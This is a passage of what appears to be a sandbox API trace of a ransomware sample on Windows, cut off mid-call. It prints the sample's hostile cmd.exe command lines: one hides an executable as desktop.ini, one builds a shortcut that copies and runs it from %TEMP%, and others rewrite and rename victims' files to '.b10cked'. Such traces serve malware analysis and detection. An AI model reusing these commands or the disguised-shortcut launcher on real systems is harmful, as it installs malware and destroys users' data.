lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xc28, dwThreadId=0xc98)) returned 1 [0150.548] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0151.498] CloseHandle (hObject=0x114) returned 1 [0151.498] CloseHandle (hObject=0x110) returned 1 [0151.498] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.498] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0151.498] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0151.498] GetTickCount () returned 0x2ecae [0151.498] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20828761084) returned 1 [0151.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x45\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x74\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.499] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0151.499] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0151.499] CharUpperBuffW (in: lpsz="explorer.exe \"MF\" & type \"MF\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x55 | out: lpsz="EXPLORER.EXE \"MF\" & TYPE \"MF\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x55 [0151.499] 
CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0151.499] CharUpperBuffW (in: lpsz="explorer.exe \"MF\" & type \"MF\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x56 | out: lpsz="EXPLORER.EXE \"MF\" & TYPE \"MF\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x56 [0151.499] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0151.499] CoInitialize (pvReserved=0x0) returned 0x0 [0151.499] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0151.501] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0151.501] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0151.501] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0151.503] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"MF\" & type \"MF\\desktop.ini\" > \"%TEMP%\\EtIeJuvp.exe\" && \"%TEMP%\\EtIeJuvp.exe\"") returned 0x0 [0151.503] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0151.503] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 
[0151.503] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0151.503] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\MF.lnk", fRemember=0) returned 0x0 [0151.512] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0151.512] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0151.512] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0151.512] CoUninitialize () [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0151.517] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20830702764) returned 1 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3a7c [0151.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0151.521] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.522] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.522] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.522] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3594 [0151.522] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0151.523] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0151.523] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.523] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3a7c [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3a7c [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.524] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.524] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0151.525] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0151.525] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0151.525] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0151.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pending.GRL", 
cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0151.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pending.GRL", cchWideChar=11, lpMultiByteStr=0x131324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pending.GRL", lpUsedDefaultChar=0x0) returned 11 [0151.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3a7c [0151.531] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0151.531] CloseHandle (hObject=0x114) returned 1 [0151.531] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL") returned 0x29 [0151.626] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0151.627] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbec, dwThreadId=0xc38)) returned 1 [0151.633] CloseHandle (hObject=0x110) returned 1 [0151.633] CloseHandle (hObject=0x114) returned 1 [0151.633] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0151.633] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0151.633] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount1=32, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount2=32) returned 2 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.633] ReleaseMutex (hMutex=0xf8) returned 1 [0151.633] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20842431552) returned 1 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.635] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3960 [0151.636] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0151.636] 
